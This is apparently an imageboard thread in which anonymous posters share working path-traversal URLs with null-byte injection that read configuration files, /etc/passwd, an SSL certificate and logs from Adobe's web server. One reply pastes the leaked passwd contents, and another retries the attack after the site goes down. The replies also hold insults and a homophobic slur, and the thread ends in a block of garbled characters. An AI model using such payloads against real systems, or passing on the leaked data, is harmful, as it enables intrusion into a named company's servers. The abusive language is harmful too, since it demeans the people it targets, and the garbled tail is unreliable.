Adobes webserver compromised

httpd.conf
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/httpd.conf%00
store conf
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/store.adobe.com.conf%00
/etc/passwd
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//etc/passwd%00
m0ar stuffs, CRT key:
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/ssl.crt/intermediate-ca.crt%00

and finally an error log:
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//var/log/apache/errors.base%00

This is /prog/, not /exploit-some-shitty-cgi-script-noone-gives-a-fuck-about/

Right, and as programmers I thought this post would have been of some interest considering although it's some shitty cgi script, it was written by an employee at Adobe, one of the worlds biggest software companies who failed in taking even basic precautions against user input regarding disc access.

The result of this exposure is probably going to mean someone getting fired at best, and more than likely, their entire webserver fucked over or even worse.

Anyway if you don't give a fuck then please, take this post and sage it to hell and back, you might have to burn your wings on the sun first you fucking fairy fag up in heaven my ass

i lold.

Oh boy, some ENTERPRISE PROGRAMMER made an obvious mistake. You've found yourself a real winner here!

Get the fuck out.

lol enterprise programmers

Well it's down.

We're sorry, the site area you've requested is unavailable due to scheduled maintenance. Please try again later.
http://www.adobe.com/special/message.html?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/httpd.conf%2500

One day soon it will be up on google cache where it's soul will live on forever

>>3
You're kidding, right?

This shit happens all the time to tiny companies and huge giants alike. Security vulnerabilities are nothing new.


root:x:0:0:Super-User:/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico smmsp:x:25:25:SendMail Message Submission Program:/: listen:x:37:4:Network Admin:/usr/net/nls: gdm:x:50:50:GDM Reserved UID:/: webservd:x:80:80:WebServer Reserved UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/: patrol:x:9331:9331:Monitoring:/opt/patrol:/bin/ksh wwwtools:x:11274:11274:Web-Tech Admin:/home/wwwtools:/bin/csh wwwlogs:x:11275:11275:Log Admin:/home/wwwlogs:/usr/lib/rsh wwwdocs:x:60005:60030:Content:/home/wwwdocs:/usr/lib/rsh httpd:x:60004:60004:Apache:/home/httpd:/usr/lib/rsh svctag:x:60006:12::/tmp:/bin/pfsh

just in case!

ITT hackers on steroids

>>9
shadowed password is shadowed

>>1
..
there is
no
pas
s
wo
rd t
here y
ou f
uck
ing a
sshol
e.

14 Name: Anonymous 2012-06-25 23:04

䉄ᔡᡁ╨㐄炕зጳ╩鎇傖恙䅇㞓搄䁵荑坹⑒☣禉敢鑄ʀ̤坘父碔愣ࡆ蜹椘圆梐ᅅ榔鐆鐇ɰ䖒霥䕗䄳杄ᥰ䉃薙耵䉀䁴猴ठ猴猓灔祓֓ᕳ☹袐琤㍙祧अ效⦐厈唔ht⥳☦΅褴閔敘杦襙聁ᄉ䅢閈錂阸慠猰陔瘳怑㤹榈չ䚑Ē❁栰刨ũၹ℣敕㝰⑰С䄷খ鍉؇霉䦗䠩℃ͥ㉉䥉阰ᒉ䝗„ģ鄰枂顩蠙ㄡ㔵唀䥣ࠥᑶ⥠☆㕵持嘹蠠ဲ斘鈹瀧䘀➔h䍣ᄁ䈃䐓䈥㝲董ձТ䐣ᚖ愳栱剱璕ᚆ艸ኖㅗ㊔㌘禄⥲፣攦蚔䕀㘷饲▘ㄲɖ堘ऄ䒓≂䥩䑁蜢研䉈遵桠ㅓ甀牤硘顙畘ᙸƉ蕘᠗ॣ蔖嚅͈啶㘸㑒ᕶ爡鈑〡ᅒΆ偤ᐧ砣чࡁ⒈ٔŲ␠杩ㅥҖ㖅遄猷⁦适က戲嚈噉镅㝤倥ၓ呗䊁ᡵ衦ᕥ祄蝀奥䊒夘霅⎔㉘ŕ␣脆甧✑Uう蜕癆։妃畦阱錣⁅甉萸蠴址ɹ襂䝣ħ逐酶刧☓遨㝶᜶摅甘褦螆聅堂ᒃ顕䌷␲ᝤ剠卸昨蝠鐢冁ဦ坥䠔䕄成